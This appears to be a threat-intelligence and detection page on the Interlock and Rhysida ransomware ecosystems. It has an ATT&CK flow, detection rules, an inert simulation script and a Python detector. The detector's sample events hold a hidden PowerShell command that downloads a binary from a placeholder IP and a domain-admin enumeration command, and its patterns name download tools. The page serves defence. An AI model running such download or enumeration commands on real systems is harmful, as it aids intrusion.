Interlock and Rhysida: AI in the Ransomware Ecosystem
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
IBM X-Force research highlights a strong connection between the Interlock (Hive0163) and Rhysida ransomware ecosystems. The report outlines an intricate network of shared malware families, specialized crypters, and coordinated initial access brokers. Interlock appears to be a highly mature threat group using custom tooling such as NodeSnake and InterlockRAT, and it may have evolved from operators previously associated with Rhysida.
Investigation
X-Force carried out long-term research over more than two years, analyzing malware samples, attack chains, and staging infrastructure. The investigation uncovered substantial code similarities across multiple backdoors and tracked the development of dedicated crypters such as JunkFiction and Tomb. Researchers also mapped ties between threat actors and initial access brokers through overlapping infrastructure and tool usage.
Mitigation
Organizations should deploy strong endpoint detection and response capabilities to identify suspicious process behavior, including unexpected PowerShell activity and unauthorized registry changes. Prompt patching of internet-facing network devices is essential to reduce the risk of exploitation of vulnerabilities such as CVE-2026-20131. Enforcing strict WDAC controls and monitoring for unapproved RMM tool activity can also limit post-compromise operations.
Response
If Interlock or Rhysida activity is suspected, isolate impacted systems immediately to stop lateral movement through RDP or SOCKS5 tunnels. Conduct a thorough review of staging infrastructure and check for unauthorized remote management tools such as ConnectWise ScreenConnect. Review logs for suspicious PowerShell execution and investigate any unauthorized changes involving scheduled tasks or systemd services.
```mermaid
graph TB
%% Class Definitions
classDef initial_access fill:#f96,stroke:#333,stroke-width:2px
classDef evasion fill:#bbf,stroke:#333,stroke-width:2px
classDef execution fill:#dfd,stroke:#333,stroke-width:2px
classDef persistence fill:#fdd,stroke:#333,stroke-width:2px
classDef command_control fill:#ffd,stroke:#333,stroke-width:2px
classDef discovery fill:#dff,stroke:#333,stroke-width:2px
classDef lateral_movement fill:#dcd,stroke:#333,stroke-width:2px
classDef impact fill:#f99,stroke:#333,stroke-width:2px
classDef tool_malware fill:#eee,stroke:#333,stroke-width:1px

%% Initial Access Phase
action_drive_by["<b>Action</b> – <b>T1189 Drive-by Compromise</b><br/>Victims lured via fraudulent websites,<br/>malicious ads, or search engine redirects."]
class action_drive_by initial_access
action_content_injection["<b>Action</b> – <b>T1204 Content Injection</b><br/>Use of Traffic Distribution Systems (TDS)<br/>like TAG-124 or ClickFix to redirect users."]
class action_content_injection initial_access
action_subvert_trust["<b>Action</b> – <b>T1553 Subvert Trust Controls: Code Signing</b><br/>Using fraudulent certificates like<br/>Foshan Yongqiheng Trading Co., Ltd."]
class action_subvert_trust evasion

%% Execution and Transfer Phase
action_user_exec["<b>Action</b> – <b>T1204 User Execution</b><br/>Execution of trojanized installers<br/>(e.g., Microsoft Teams, Chrome, or Edge)."]
class action_user_exec execution
malware_initial_payload["<b>Malware</b> – <b idea='Payloads'>JunkFiction, NodeSnake, or Endico</b><br/>Initial stage downloaders executed<br/>via user interaction."]
class malware_initial_payload tool_malware
action_ingress_transfer["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/>Retrieving second-stage malware from<br/>remote Command and Control servers."]
class action_ingress_transfer execution
malware_second_stage["<b>Malware</b> – <b idea='Backdoors'>Supper or InterlockRAT</b><br/>Second-stage backdoors retrieved<br/>to facilitate remote access."]
class malware_second_stage tool_malware

%% Persistence Phase
action_persistence_linux["<b>Action</b> – <b>T1543.003 Boot or Logon Initialization Scripts: Systemd Service</b><br/>Linux NodeSnake variants creating<br/>new systemd services."]
class action_persistence_linux persistence
action_persistence_windows["<b>Action</b> – <b idea='T1547 Unix Shell Configuration Modification'>Windows Persistence</b><br/>Utilizing shell configuration modifications<br/>to maintain a foothold."]
class action_persistence_windows persistence

%% Command and Control Phase
action_c2["<b>Action</b> – <b>T1219 Remote Access Software</b><br/>Establishing reverse shells and<br/>SOCKS5 tunnels for stealthy communication."]
class action_c2 command_control

%% Discovery Phase
action_discovery_domain["<b>Action</b> – <b>T1087.002 Account Discovery: Domain Account</b><br/>Enumerating domain accounts using<br/>commands like net user /domain."]
class action_discovery_domain discovery
action_discovery_groups["<b>Action</b> – <b>T1069.002 Permission Groups Discovery: Domain Groups</b><br/>Enumerating groups using<br/>net group domain admins /domain."]
class action_discovery_groups discovery

%% Lateral Movement and Impact Phase
action_lateral_move["<b>Action</b> – <b>T1210 Exploitation of Remote Services</b><br/>Moving through environment via RDP<br/>sessions initiated through reverse shells."]
class action_lateral_move lateral_movement
action_selective_exclusion["<b>Action</b> – <b idea='Defense Evasion'>Selective Exclusion</b><br/>Deploying custom WDAC policies to deny<br/>Microsoft Defender or Sophos EDR."]
class action_selective_exclusion evasion
action_impact_encryption["<b>Action</b> – <b>T1486 Data Encrypted for Impact</b><br/>Final deployment of Interlock or Rhysida<br/>ransomware to encrypt victim files."]
class action_impact_encryption impact

%% Connections
action_drive_by -->|facilitates| action_content_injection
action_content_injection -->|leads_to| action_user_exec
action_user_exec -->|uses| malware_initial_payload
malware_initial_payload -->|requires| action_subvert_trust
malware_initial_payload -->|triggers| action_ingress_transfer
action_ingress_transfer -->|downloads| malware_second_stage
malware_second_stage -->|establishes| action_persistence_linux
malware_second_stage -->|establishes| action_persistence_windows
malware_second_stage -->|enables| action_c2
action_c2 -->|performs| action_discovery_domain
action_c2 -->|performs| action_discovery_groups
action_discovery_domain -->|informs| action_lateral_move
action_discovery_groups -->|informs| action_lateral_move
action_lateral_move -->|leads_to| action_selective_exclusion
action_selective_exclusion -->|precedes| action_impact_encryption
```
Attack Flow
Detections
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- Download or Upload via Powershell (via cmdline)
- Possible System Enumeration (via cmdline)
- Possible Remote System Discovery or Connectivity Check (via cmdline)
- Possible Admin Account or Group Enumeration (via cmdline)
- Suspicious Domain Trusts Discovery (via cmdline)
- Possible Evasion Checks (via powershell)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Steam Community DNS Request Performed By Suspicious Process (via dns_query)
- IOCs (HashSha256) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem Part 3
- IOCs (HashSha256) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem Part 2
- IOCs (HashSha256) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem Part 1
- IOCs (SourceIP) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem
- IOCs (DestinationIP) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem
- JunkFiction Downloader and Scheduled PowerShell Script Detection [Windows Powershell]
- Detection of Supper Backdoor and JunkFiction Downloader [Windows Process Creation]
- Detection of NodeSnake and InterlockRAT Activity [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
- Attack Narrative & Commands: The adversary has successfully compromised a developer's workstation via a supply chain attack (T1195.003). They have dropped a malicious Node.js payload named InterlockRAT.js into a temporary directory. The goal is to establish a persistent backdoor to facilitate lateral movement within the network. The attacker executes the script using the node runtime, passing specific arguments to initialize a SOCKS5 proxy for tunneling traffic. This specific command is designed to trigger the existing detection logic.
- Regression Test Script:

```bash
# Create a dummy directory for the malware
mkdir -p /tmp/malware_drop

# Create the 'malicious' InterlockRAT.js file
cat <<EOF > /tmp/malware_drop/InterlockRAT.js
// Simulated malware logic
console.log("Initializing InterlockRAT payload...");
EOF

# Execute the file with the specific strings required to trigger the rule
node /tmp/malware_drop/InterlockRAT.js --mode SOCKS5 --target reverse shell 10.0.0.5
```

- Cleanup Commands:

```bash
# Remove the simulated malware files and directories
rm -rf /tmp/malware_drop
```
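As an added example (not part of this page or the X-Force report), the following Python applies three rule conditions approximating the detection titles listed above to constructed process-creation events, including the exact command the regression test runs, and stays silent on benign look-alikes. The rule logic, event field names and sample events are assumptions, since the platform's actual query logic is not shown on this page.

```python
import re

# Constructed process-creation events (made up for this example, not from the report).
SAMPLE_EVENTS = [
    {"host": "linux-dev01", "image": "/usr/bin/node",
     "cmdline": "node /tmp/malware_drop/InterlockRAT.js --mode SOCKS5 --target reverse shell 10.0.0.5"},
    {"host": "linux-dev01", "image": "/usr/bin/node",
     "cmdline": "node /opt/app/server.js --port 8080"},
    {"host": "win-ws07", "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net group "domain admins" /domain'},
    {"host": "win-ws07", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: \\fileserver\share"},
    {"host": "win-ws07", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"Invoke-WebRequest http://203.0.113.10/s.bin -OutFile C:\\Users\\Public\\s.bin\""},
]

# Assumed rule logic that approximates the rule titles; not the platform's real queries.
STAGING_JS = re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/\S+\.js\b", re.I)
TUNNEL_TERMS = re.compile(r"socks5|reverse\s+shell", re.I)
ADMIN_ENUM = re.compile(r"\bnet1?(\.exe)?\s+(group|localgroup)\b.*\badmins?\b", re.I)
PS_TRANSFER = re.compile(
    r"(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer|curl|wget)\b.*https?://", re.I)


def matched_rules(event):
    """Return the names of the rules a single process-creation event satisfies."""
    image = event["image"].replace("\\", "/").lower()
    cmd = event["cmdline"]
    hits = []
    # Mirrors the regression test: node running a .js from a staging dir with tunnelling strings.
    if image.endswith("/node") and STAGING_JS.search(cmd) and TUNNEL_TERMS.search(cmd):
        hits.append("Detection of NodeSnake and InterlockRAT Activity [Linux Process Creation]")
    # net group / net localgroup queries that name an admins group.
    if image.endswith(("/net.exe", "/net1.exe")) and ADMIN_ENUM.search(cmd):
        hits.append("Possible Admin Account or Group Enumeration (via cmdline)")
    # PowerShell invoking a download/upload cmdlet or tool against an http(s) URL.
    if "powershell" in image and PS_TRANSFER.search(cmd):
        hits.append("Download or Upload via Powershell (via cmdline)")
    return hits


def detect(events):
    """Run every rule over a batch of events; returns (host, rule, cmdline) tuples in event order."""
    return [(e["host"], rule, e["cmdline"]) for e in events for rule in matched_rules(e)]


if __name__ == "__main__":
    for host, rule, cmdline in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}\n    {cmdline}")
```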